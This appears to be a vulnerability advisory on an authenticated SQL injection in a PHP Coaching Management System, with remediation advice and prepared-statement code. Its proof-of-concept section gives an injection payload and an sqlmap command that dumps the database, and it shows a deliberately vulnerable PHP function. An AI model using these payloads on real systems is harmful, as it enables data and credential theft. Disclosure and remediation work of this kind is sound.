# Vulnerability Summary: CVE-2026-7229-SQLI

## Vulnerability Overview

**Title**: Authenticated SQL Injection in Coaching Management System Allows Database Dumping

**Type**: SQL Injection (SQLi)

**Description**: In the PHP-based Coaching Management System, the `complaintreply` parameter handled by the administrator module is concatenated into an SQL query without sanitization or parameterization. An authenticated attacker (administrator) can inject arbitrary SQL and extract the entire database.

## Impact Scope

* **Affected File**: `/cims/modules/admin/reply.php`
* **Affected Parameter**: `complaintreply`
* **Attack Vector**: Remote, Authenticated (Administrator)
* **Database**: MySQL (MariaDB)
* **Impact**: Database Dump / Credential Leakage
* **Severity**: CRITICAL
  * Potential for full database extraction
  * Exposure of credentials stored in plaintext
  * Complete leakage of application data
  * Authentication bypass and privilege escalation via extracted credentials
  * Full database dump achieved, including user tables (credentials), student PII, teacher records, and complaint history

## Remediation

* **Vendor**: code-projects.org
* **Product**: Coaching Management System in PHP
* **Version**: Unknown (tested on the latest version available as of April 2026)
* **Recommendation**: Use prepared statements (parameterized queries) for every query that incorporates `complaintreply`, and apply strict input validation to the parameter. Escaping alone is not a substitute for parameterization.

## Proof of Concept (POC) Code

**1. Injection Payload**

```sql
complaintreply=" OR 1=1-- &submit=submit
```

**2. Database Dump Command**

`sql1.txt` is the saved HTTP request (including the authenticated administrator session cookie) with the injected parameter; sqlmap replays it and enumerates the database from there.

```bash
sqlmap -r sql1.txt --dump
```
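The remediation above recommends prepared statements. The following is an added illustrative example, not the project's actual `reply.php` source (which is not reproduced on this page): it shows the concatenation pattern that the PoC payload exploits next to a hardened version using mysqli prepared statements. The table and column names (`tblcomplaints`, `complaintreply`, `status`, `id`) and the `cid` request parameter are assumptions for illustration.

```php
<?php
// Added illustrative example (not the project's own reply.php).
// Table/column names and the `cid` parameter are assumptions.

// --- Vulnerable pattern: user input concatenated into the query text ---
// A value such as  " OR 1=1--  closes the string literal and turns the rest
// of the statement into attacker-controlled SQL, which is what the PoC abuses.
function reply_vulnerable(mysqli $db, array $post): bool
{
    $reply = $post['complaintreply'];
    $cid   = $post['cid'];
    $sql = 'UPDATE tblcomplaints SET complaintreply="' . $reply
         . '", status="Closed" WHERE id=' . $cid;
    return (bool) $db->query($sql);
}

// --- Hardened version: prepared statement with bound parameters ---
// The query text is fixed at prepare() time; the reply and the id travel
// separately as data, so quotes, comment sequences and keywords inside
// $reply are never parsed as SQL. Input validation narrows what the
// application accepts at all, but the prepared statement is the control
// that removes the injection.
function reply_safe(mysqli $db, array $post): bool
{
    $reply = $post['complaintreply'] ?? '';
    $cid   = filter_var($post['cid'] ?? '', FILTER_VALIDATE_INT);

    // Reject malformed input before it reaches the database.
    if ($cid === false || $cid <= 0 || $reply === '' || strlen($reply) > 2000) {
        return false;
    }

    $stmt = $db->prepare(
        'UPDATE tblcomplaints SET complaintreply = ?, status = "Closed" WHERE id = ?'
    );
    if ($stmt === false) {
        return false;
    }
    $stmt->bind_param('si', $reply, $cid); // s = string, i = integer
    $ok = $stmt->execute();
    $stmt->close();
    return $ok;
}

// Usage (assumes a configured connection; credentials are placeholders):
// mysqli_report(MYSQLI_REPORT_ERROR | MYSQLI_REPORT_STRICT);
// $db = new mysqli('localhost', 'user', 'pass', 'cims');
// var_dump(reply_safe($db, $_POST));
```

Sending the PoC payload to `reply_safe()` stores the literal text `" OR 1=1-- ` as the reply and updates only the row whose `id` matches the validated integer; the same payload against `reply_vulnerable()` rewrites the WHERE clause and, under sqlmap, becomes the foothold for dumping every table.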